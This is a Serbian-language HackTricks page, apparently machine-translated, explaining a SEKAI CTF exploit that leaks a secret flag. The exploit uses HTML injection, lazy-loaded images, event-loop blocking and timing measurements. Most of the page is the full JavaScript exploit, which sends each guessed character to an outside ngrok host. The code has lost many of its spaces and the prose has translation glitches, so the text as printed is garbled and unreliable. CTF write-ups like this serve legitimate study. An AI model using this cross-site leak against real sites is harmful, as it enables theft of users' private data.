Radite li u kompaniji za kibernetičku bezbednost? Želite li da vidite vašu kompaniju reklamiranu na HackTricks-u? Ili želite da imate pristup najnovijoj verziji PEASS-a ili preuzmete HackTricks u PDF formatu? Proverite SUBSCRIPTION PLANS!
U ovom eksploit-u, @aszx87410 kombinuje tehniku lenjih slika kao kanal za komunikaciju putem HTML ubacivanja sa vrstom tehnike blokiranja petlje događaja kako bi otkrio karaktere.
Ovo je različit eksploit za CTF izazov koji je već komentarisao na sledećoj stranici. Pogledajte za više informacija o izazovu:
Napadač može ubaciti post koji počinje sa "A", zatim neki HTML tag (poput velikog <canvas) će zauzeti veći deo ekrana i nekoliko krajnjih <img lazy tagova za učitavanje stvari.
Ako umesto "A" napadač ubaci isti post koji počinje sa "z", post sa flag-om će se prvo pojaviti, a zatim će se ubaceni post pojaviti sa početnim "z" i velikim canvas-om. Zato što je post sa flag-om prvo se pojavio, prvi canvas će zauzeti ceo ekran i krajnji <img lazy tagovi ubačeni neće biti vidljivi na ekranu, tako da se neće učitati.
Zatim, dok bot pristupa stranici, napadač će slati fetch zahteve.
Ako se slike ubačene u post učitavaju, ovi fetch zahtevi će trajati duže, tako da napadač zna da je post pre flag-a (abecedno).
Ako su fetch zahtevi brzi, to znači da je postabecedno posle flag-a.
Hajde da proverimo kod:
<!DOCTYPEhtml><html><!--The basic idea is to create a post with a lot of images which send request to "/" to block server-side nodejs event loop.
If images are loading, the request to "/" is slower, otherwise faster.By using a well-crafted height, we can let note with "A" load image but note with "Z" not load.We can use fetch to measure the request time.--><body><buttononclick="run()">start</button><!-- Inject post with payload --><formid=faction="http://localhost:1234/create"method="POST"target="_blank"><inputid=inpname="text"value=""></form><!-- Remove index --><formid=f2action="http://localhost:1234/remove"method="POST"target="_blank"><inputid=inp2name="index"value=""></form><script>let flag ='SEKAI{'constTARGET='https://safelist.ctf.sekai.team'f.action =TARGET+'/create'f2.action =TARGET+'/remove'constsleep= ms =>newPromise(r =>setTimeout(r, ms))// Function to leak info to attackerconstsend= data =>fetch('http://server.ngrok.io?d='+data)constcharset='abcdefghijklmnopqrstuvwxyz'.split('')// start exploitlet count =0setTimeout(async () => {letL=0letR=charset.length-1// I have omited code here as apparently it wasn't necesary// fallback to linerar since I am not familiar with binary search lolfor(let i=R; i>=L; i--) {let c = charset[i]send('try_'+ flag + c)constfound=awaittestChar(flag + c)if (found) {send('found: '+ flag+c)flag += cbreak}}},0)asyncfunctiontestChar(str) {returnnewPromise(resolve => {/*For 3350, you need to test it on your local to get this number.The basic idea is, if your post starts with "Z", the image should not be loaded because it's under lazy loading threshold
If starts with "A", the image should be loaded because it's in the threshold.*/// <canvas height="3350px"> is experimental and allow to show the injected// images when the post injected is the first one but to hide them when// the injected post is after the post with the flaginp.value = str + '<br><canvas height="3350px"></canvas><br>'+Array.from({length:20}).map((_,i)=>`<img loading=lazy src=/?${i}>`).join('')
f.submit()setTimeout(() => {run(str, resolve)},500)})}asyncfunctionrun(str, resolve) {// Open posts page 5 timesfor(let i=1; i<=5;i++) {window.open(TARGET)}let t =0constround=30//Lets time 30 requestssetTimeout(async () => {// Send 30 requests and time eachfor(let i=0; i<round; i++) {let s =performance.now()awaitfetch(TARGET+'/?test', {mode:'no-cors'}).catch(err=>1)let end =performance.now()t += end - sconsole.log(end - s)}constavg= t/round// Send info about how much time it tooksend(str +","+ t +","+"avg:"+ avg)/*I get this threshold(1000ms) by trying multiple times on remote admin botfor example, A takes 1500ms, Z takes 700ms, so I choose 1000 ms as a threshold*/constisFound= (t >=1000)if (isFound) {inp2.value ="0"} else {inp2.value ="1"}// remember to delete the post to not break our leak oraclef2.submit()setTimeout(() => {resolve(isFound)},200)},200)}</script></body></html>
Da li radite u cybersecurity kompaniji? Želite li da vidite svoju kompaniju reklamiranu na HackTricks-u? Ili želite da imate pristup najnovijoj verziji PEASS-a ili preuzmete HackTricks u PDF formatu? Proverite SUBSCRIPTION PLANS!